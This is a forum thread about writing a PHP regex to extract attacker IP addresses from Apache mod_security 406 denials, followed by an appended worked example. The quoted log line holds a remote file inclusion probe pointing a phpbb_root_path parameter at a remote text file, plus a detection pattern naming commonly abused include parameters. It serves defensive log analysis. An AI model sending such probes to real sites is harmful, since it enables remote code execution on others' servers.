[Fri Mar 28 15:18:39 2008] [error] [client nnn.nnn.nnn.0] mod_security: Access denied with code 406. Pattern match "(THEME_DIR|siteurl|set|pagina|BBCodeFile|page|basepath|fondo| root_path|pg|classes_dir|CONFIGFILE|css_path|phpraid_dir|story| sbp|vwar_root|cart_isp_root|mosConfig_absolute_path|mosConfig_live_site| inc_dir|rootSys|CONFIG_EXT\\\\[LANGUAGES_DIR\\\\]|CONFIG\\\\[path\\\\]| vwar_root|pathtoashnews|php\\\\?dir|aedating4CMS.php\\\\?dir\\\\[inc\\\\]| includes\\\\/include_once\\\\.php\\\\?include_file|Home_Path|adm_path| systempath|path)=http" at THE_REQUEST [severity "EMERGENCY"] [hostname "www.mysite.com"] [uri "/forum-viewtopic-t-196.html//includes/functions_portal.php?phpbb_root_path=http://example.com/new/id.txt?"]
So the IP always seems to be preceded with [error] and followed by mod_security: Access denied with code 406
So how would I come up with a regex that would extract these IPs that I can use with preg_match_all?
thanks,
brian
How's your regex?
$ipreg="/([1-9]{1}\d{1}|[1-9]{1,2}|1\d\d|2[0-4]\d|25[0-5])\.(\d{1}|[1-9]{1}\d{1}|1\d\d|2[0-4]\d|25[0-5])\.(\d{1}|[1-9]{1}\d{1}|1\d\d|2[0-4]\d|25[0-5])\.(\d{1}|[1-9]{1}\d{1}|1\d\d|2[0-4]\d|25[0-5])/";
But I need to figure out what to add to it so it just matches the IPs that are associated with the security breach.
thanks,
brian
Besides, mod_security is catching them, so I reckon you're OK.
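One way to do what the question asks, as an added example that is not part of any post in the thread: anchor the regex on the fixed text around the address (`[error] [client ...] mod_security: Access denied with code 406`), capture the address loosely, and leave octet-range checking to `filter_var()`. The function name `deniedClients` and the sample log lines are constructed for illustration; the addresses come from the documentation ranges.

```php
<?php
// Added example, not code from the thread. Requires PHP 7.3 or later.
// Constructed sample log: two denied hits from one client, one unrelated
// [error] line, one denied hit from a second client, one malformed address.
$log = <<<'LOG'
[Fri Mar 28 15:18:39 2008] [error] [client 192.0.2.10] mod_security: Access denied with code 406. Pattern match "(page|path)=http" at THE_REQUEST [severity "EMERGENCY"] [hostname "www.mysite.com"] [uri "/index.php?page=http://example.com/id.txt?"]
[Fri Mar 28 15:19:02 2008] [error] [client 198.51.100.7] File does not exist: /var/www/favicon.ico
[Fri Mar 28 15:20:11 2008] [error] [client 192.0.2.10] mod_security: Access denied with code 406. Pattern match "(page|path)=http" at THE_REQUEST [severity "EMERGENCY"] [hostname "www.mysite.com"] [uri "/index.php?path=http://example.com/id.txt?"]
[Fri Mar 28 15:21:40 2008] [error] [client 198.51.100.23] mod_security: Access denied with code 406. Pattern match "(page|path)=http" at THE_REQUEST [severity "EMERGENCY"] [hostname "www.mysite.com"] [uri "/a.php?page=http://example.com/id.txt?"]
[Fri Mar 28 15:22:05 2008] [error] [client 999.1.1.1] mod_security: Access denied with code 406. Pattern match "(page|path)=http" at THE_REQUEST
LOG;

/**
 * Return [ip => hit count] for mod_security 406 denials, busiest first.
 */
function deniedClients(string $log): array
{
    // The /m flag makes ^ match at the start of every log line, so the
    // timestamp, [error] and [client ...] fields must appear in that order.
    // Only lines that continue with the mod_security denial text match;
    // other [error] lines from the same clients are ignored.
    $re = '/^\[[^\]]+\] \[error\] \[client ([0-9.]+)\] '
        . 'mod_security: Access denied with code 406\b/m';
    preg_match_all($re, $log, $m);

    $counts = [];
    foreach ($m[1] as $ip) {
        // Validate the captured text as IPv4 instead of encoding the
        // 0-255 octet rules in the regex itself.
        if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) === false) {
            continue;
        }
        $counts[$ip] = ($counts[$ip] ?? 0) + 1;
    }
    arsort($counts); // highest hit count first, keys preserved
    return $counts;
}

print_r(deniedClients($log));
```

Run against a real error log with `deniedClients(file_get_contents($path))`, where `$path` is wherever your Apache error log lives.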